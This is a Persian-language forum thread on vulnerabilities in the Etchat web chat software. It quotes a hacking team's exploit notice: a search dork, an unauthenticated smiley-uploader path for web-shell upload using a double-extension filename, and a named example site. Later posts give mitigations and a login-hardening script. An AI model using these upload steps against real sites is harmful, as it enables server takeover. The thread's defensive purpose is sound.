SpareNet Servers Advertising & Link Exchange

اطلاعیه

بستن
هیچ اطلاعیه ای هنوز ایجاد نشده است .

تاپیک بررسی و امنیت سیستم سرویس چت Etchat

بستن
X
 
  • فیلتر
  • زمان
  • نمایش
پاک کردن همه
نوشته‌های جدید

  • تاپیک بررسی و امنیت سیستم سرویس چت Etchat

    سلام بر عزیزان

    سیستم Etchat یک نرم افزار تحت وب برای سرویس چت (تنها text) میباشد . در این تاپیک تمامی آسیب پذیری ها این سیستم مورد بررسی و راههای جلوگیری از نفوذ این سیستم مطرح میشود .

    با توجه به نوع کد نویسی این سیستم میتوان به آماتور بودن Programmer این سیستم پی برد .

    ضعف در هسته آپلودر - مشکلات فایل های داخلی - کنترل آپلود فایل - سیکور نبودن عناصر TextBox و ....

    از مشکلات اساسی این مجموعه میباشد . مدتی قبل ما این سیستم را بطور آزمایشی بر روی یکی از وبسایت های دوستان راه اندازی نمودیم که در ابتدا آپلودر را بستیم پس از مدتی باز گذاشتیم و امکان آپلود شل به وجود آمد در این بخش به روش های نفوذ و راههای جلوگیری از نفوذ به این سیستم ها میپردازیم . متاسفانه افرادی که در این زمینه فعالیت میکنند بصورت تخصصی این سیستم را مورد آنالیز قرار نداده اند .

    آسیب پذیری های کشف شده توسط تیم :

    Et-chat remote file uploader

    [align=left]

    -------------------- IN The NAme OF God --------------------

    -====Et-chat remote file uploader (RFU)====-

    # Exploit Title:Et-chat remote file uploader (RFU)
    # Exploit Author: FarbodEZRaeL
    # Tested on: xp
    # MAil : [email protected]
    -====Dork====-

    inurl:/styles/admin_tpl/

    -====Exploit====-

    http://Site.C0M/styles/admin_tpl/createNewSmilies.tpl.html

    -====Example====-

    http://ya30chat.ir/styles/admin_tpl/createNewSmilies.tpl.html

    -====information====-

    Click <<--- Add Profile Picture or Add Picture -----Upload She3ll~~~>
    Sh3ll.jpg or Sh3ll.php.Jpg

    -====Tnx To====-

    Persian Gulf For Ever ~~~~ > W3 Are Persian Hackerz

    MR.XpR - MMT - Samim.s - FarbodEZRaeL - Inj3Ctor - Black.Viper - UnknowN

    Yaghi.Vahshi - HELLBOY - IrIsT - Black King - Monfared - Sokote_Vahshat ...

    And All IraNHAck Security Team Members

    ~~~~~~~~~~~~~~~~~~~~~~>> IRANHaCK.ORG
    [/align]

    این آسیب پذیری امکان آپلود شل و لود کردن شل از مسیر http://site.com/chat/smilies/shell.php را فراهم میسازد که یک اکسپلویت هم در این زمینه توسط یک تیم نوشته شده . همچنین میتوان به آپلود شل از طریق یوزر Admin یا همان مدیر از قسمت اضافه کردن شکلک ها اشاره نمود که برای این عمل یا باید آپلودر به صورتی لایه های امنیتی مناسبی داشته باشد و یا اینکه پس از ریختن شکلک های لازم این آپلودر غیر فعال شود .

    در پست های آتی روش های نفوذ و جلوگیری از نفوذ را با یکدیگر پیش میرویم .
    [align=center][/align]

  • #2
    RE: تاپیک بررسی و امنیت سیستم سرویس چت Etchat

    این سیستم برنامه نویسی ضعیفی داره خیلی باگ داده نمیشه خودتون با دوستان Cms این سیستمو اوکی کنید و از 0 همه مراحلشو آموزش بدید چون سیستم محبوبی هست تو ایران و همه هم باهاش مشکل دارند .

    افراد زیادی هم دارن از طریق این سیستم مردم بیچاره رو تلکه میکنند .

    Me30
    [align=center]****Hayat sevgi ile güzeldir
    Life is beautiful with love****[/align]

    نظر


    • #3
      RE: تاپیک بررسی و امنیت سیستم سرویس چت Etchat

      روش های آپلود شل به دو صورت میباشد :

      این موضوع رو متذکر میشم که اگر پریم پوشه Smilies را از 777 به 664 تغییر بدید آپلودر غیر فعال میشود ولی از طریق آپلودر createNewSmilies.tpl.htm شما هنوز در معرض خطر میباشید پس مراحل زیر را طی کنید :

      آسیب پذیری اول در خود کنترل پنل مدیریت میباشد که در قسمت اضافه کردن شکلک قرار گرفته .

      آسیب پذیری دوم در قسمت styles/admin_tpl/createNewSmilies.tpl.html میباشد که نیازی به لاگین کردن ندارد .

      بنده 2 فیلم آموزشی تهیه کردم در باب موضوعات زیر :

      1 . روش نصب

      2. روش آپلود شل

      3 . روش آپلود شل با استفاده از آسیب پذیری RFU

      4 . روش جلوگیری از آپلود شل

      -----------------

      دانلود آموزشی اول - نصب و راه اندازی چتروم Etchat


      دانلود آموزشی دوم - آپلود شل و روش جلوگیری از آپلود شل
      [align=center][/align]

      نظر


      • #4
        RE: تاپیک بررسی و امنیت سیستم سرویس چت Etchat

        فایل زیر امکانات زیر را شامل میشود :
        • جلوگیری از ورود بات ها
        • جلوگیری از ورود با نامهای غیر مجاز
        • جلوگیری از ورود با نامهای غیر اخلاقی
        • ورود تنها با فعال کردن چک باکس قوانین (در صورتی که چک باکس قوانین فعال نباشد وارد نمیشود)


        [align=left]
        کد:
        http://uploaderx.persiangig.com/et-chat/login.js
        [/align]

        و این کد را در index.tpl.html قالب خود قرار دهید :

        [align=left]
        کد:
        <div style=”float:right;margin-right:5px;margin-top:40px”><input type=”checkbox” name=”check” id=”check” value=”1″> قوانین سایت را خوانده و می پذیرم
        </div>
        [/align]


        نصب : آپلود در فولدر js
        [align=center][/align]

        نظر

        صبر کنید ..
        X